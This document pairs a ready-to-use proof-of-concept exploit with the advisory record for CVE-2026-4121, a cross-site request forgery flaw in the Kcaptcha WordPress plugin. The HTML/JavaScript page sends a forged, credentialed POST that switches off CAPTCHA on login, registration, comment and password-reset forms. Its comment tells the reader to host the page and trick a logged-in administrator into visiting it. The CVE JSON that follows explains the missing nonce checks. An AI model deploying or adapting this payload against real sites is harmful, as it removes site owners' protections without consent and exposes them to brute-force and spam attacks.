CVE-2026-4121

<!-- PoC for CVE-2026-4121 Description: This HTML page attempts to disable CAPTCHA settings on the target WordPress site via CSRF. Usage: Host this file and trick the admin into visiting it while logged in. --> <html> <body> <script> // Target settings page for the Kcaptcha plugin // Adjust the URL path if the plugin admin page is located differently var targetUrl = "http://target-site/wp-admin/admin.php?page=kcaptcha_settings"; // If direct access is used: "http://target-site/wp-content/plugins/kcaptcha/admin/setting.php" // Parameters to disable CAPTCHA on login, registration, etc. var params = "kcaptcha_login=0&kcaptcha_registration=0&kcaptcha_comments=0&kcaptcha_lostpassword=0&action=update"; // Send POST request var xhr = new XMLHttpRequest(); xhr.open("POST", targetUrl, true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.withCredentials = true; xhr.send(params); // Optional: Notify attacker xhr.onreadystatechange = function() { if (xhr.readyState == 4) { console.log("Request sent"); } }; </script> </body> </html>

{"cve": {"id": "CVE-2026-4121", "sourceIdentifier": "[email protected]", "published": "2026-04-22T09:16:23.490", "lastModified": "2026-04-22T20:22:50.570", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Kcaptcha plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to and including 1.0.1. This is due to missing nonce validation in the plugin's settings page handler (admin/setting.php). The settings form does not include a wp_nonce_field() and the form processing code does not call wp_verify_nonce() or check_admin_referer() before saving settings to the database via $wpdb->update(). This makes it possible for unauthenticated attackers to modify the plugin's CAPTCHA settings (enabling or disabling CAPTCHA on login, registration, lost password, and comment forms) via a forged request, granted they can trick a site administrator into performing an action such as clicking a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/kcaptcha/tags/1.0.1/admin/setting.php#L12", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/kcaptcha/tags/1.0.1/admin/setting.php#L30", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/kcaptcha/tags/1.0.1/admin/setting.php#L47", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/kcaptcha/trunk/admin/setting.php#L12", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/kcaptcha/trunk/admin/setting.php#L30", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/kcaptcha/trunk/admin/setting.php#L47", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a6c1c73b-76e3-4cb9-ad53-9d5d4e7519c9?source=cve", "source": "[email protected]"}]}}